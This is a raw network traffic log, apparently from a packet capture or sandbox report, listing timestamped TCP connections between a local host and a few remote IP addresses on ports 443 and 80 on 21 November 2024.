                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067192078 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067234993 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067256927 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067265034 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067291021 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067308903 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067354918 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067363977 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067405939 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067414999 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.067433119 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075201988 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075221062 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075270891 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075305939 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075326920 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075697899 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075737000 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075766087 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075773954 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.075794935 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.079648972 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.079720974 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.079732895 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.090619087 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.090641975 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.090790987 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.090790987 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.090806007 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.090842962 CET8050033185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.092807055 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.092854977 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.092895031 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.092907906 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.092933893 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.092941999 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.099008083 CET44350025152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.101984978 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102010965 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102029085 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102078915 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102087021 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102107048 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102116108 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102138042 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102137089 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102157116 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102159023 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.102206945 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.106419086 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.106437922 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.106580019 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.106580019 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.106610060 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.106654882 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.109235048 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.109286070 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.109317064 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.109325886 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.109363079 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.113964081 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.113982916 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.114022017 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.114049911 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.114064932 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.114078999 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.114104986 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.115077019 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.115340948 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.119055986 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.119199991 CET50015443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.119216919 CET4435001523.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.119571924 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.119590044 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.119628906 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.119642019 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.119680882 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.123471022 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.123533964 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.123547077 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.123939991 CET44350025152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.123950958 CET44350025152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.123975992 CET44350025152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.123986959 CET44350025152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.124012947 CET50025443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.124062061 CET44350025152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.124089003 CET44350025152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.124119997 CET50025443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.124144077 CET50025443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.124658108 CET50025443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.124687910 CET44350025152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.179379940 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.179384947 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.179398060 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.210882902 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.210903883 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.210974932 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.210988045 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.211138964 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.220635891 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.220654964 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.220694065 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.220712900 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.220726967 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.220733881 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.220797062 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.220803976 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.223043919 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243055105 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243073940 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243112087 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243238926 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243238926 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243247986 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243362904 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243442059 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243484974 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243515968 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243522882 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243551016 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243753910 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243769884 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243788958 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243815899 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243819952 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243820906 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243822098 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243856907 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.243866920 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244093895 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244151115 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244158030 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244160891 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244206905 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244215965 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244234085 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244241953 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.244268894 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251324892 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251344919 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251414061 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251422882 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251455069 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251512051 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251552105 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251581907 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251590014 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251615047 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251643896 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.251648903 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.254550934 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.254616022 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.254622936 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.258219957 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.258269072 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.258312941 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.258320093 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.258353949 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.259598970 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.259799004 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.260133982 CET50016443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.260154963 CET4435001623.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.261279106 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.261301994 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.261336088 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.261347055 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.261379957 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.265841007 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.265899897 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.265908957 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.274595022 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.274614096 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.274666071 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.274677992 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.274688959 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.277173042 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.277328014 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.277337074 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.308345079 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.308363914 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.308478117 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.308478117 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.308490038 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.311295986 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.311359882 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.311367989 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.424586058 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.424619913 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.424680948 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.424714088 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.424729109 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.429153919 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.429164886 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.429234028 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.429244995 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.436379910 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.436391115 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.436408043 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.436417103 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.436460972 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.436472893 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.436496973 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.441018105 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.441049099 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.441107035 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.441116095 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.441162109 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.448326111 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.448353052 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.448389053 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.448395014 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.448402882 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.448451042 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.452977896 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.453049898 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.453058004 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.453154087 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.460834026 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.460897923 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.460930109 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.460937023 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.460972071 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.460978985 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.464333057 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.464400053 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.464406013 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.472520113 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.472562075 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.472589016 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.472595930 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.472625017 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.500535965 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.500605106 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.500617027 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.614141941 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.614187002 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.614217997 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.614231110 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.614280939 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.617376089 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.617396116 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.617412090 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.617454052 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.617495060 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.617499113 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.617546082 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.624538898 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.624558926 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.624599934 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.624603033 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.624630928 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.624635935 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.624655962 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.624661922 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.626604080 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.629108906 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.629185915 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.629194021 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.636262894 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:13.636321068 CET4435001323.44.203.17192.168.2.5
